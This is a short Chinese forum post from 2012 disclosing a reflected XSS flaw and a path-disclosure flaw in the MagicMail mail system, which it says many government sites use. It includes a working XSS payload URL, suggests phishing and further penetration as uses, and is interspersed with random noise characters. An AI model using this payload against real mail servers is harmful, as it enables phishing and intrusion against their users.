今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
/ ^8 i! Z2 n0 d8 u0 o+ |3 E
, A4 y; \0 E) O' O% y+ d; T2 R
' j6 ~# ~ K4 z; I- @包含 一个反射性XSS 以及 绝对路径泄漏0 i1 Z5 ~- [0 r# A% |
看了看 貌似全部是linux的。6 w4 I" ^+ }9 y
% q+ ^9 y+ v) F7 Z关键字:迈捷邮件系统 by MagicMail
0 q" Y) l1 g9 ~- F
4 ]) k$ B5 |7 y, d! A p9 z可以看到很多政府网站都用这个邮件系统
* I; j1 D, b) Y$ h" L# N. l% Z$ b4 f& U& ^- G
绝对路径 http://madman.in/index.php?login_type=declare&language=
. {; u5 I8 `/ n- F
1 b3 I8 }0 K7 {1 D: k5 P: q
" [7 O3 ?, T7 |( l* ~( s- J0 T# D3 \9 ?( g* ?7 V; ?% z3 z
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
! W, A, P8 E# S; ?3 @6 }+ C2 i2 K+ s* T" F5 ?( x3 }
! P3 [1 l) Q/ t. p7 U) O4 {
! A7 l7 I" q) \0 E/ s虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等: s) k( x* D1 f' B7 a. A9 m8 P1 \
. l5 G4 q9 z/ x
修复方案:看官方补丁吧。9 q8 \$ ~+ E* [5 ]
|
发表于 2012-11-9 20:38:41
收藏
支持
反对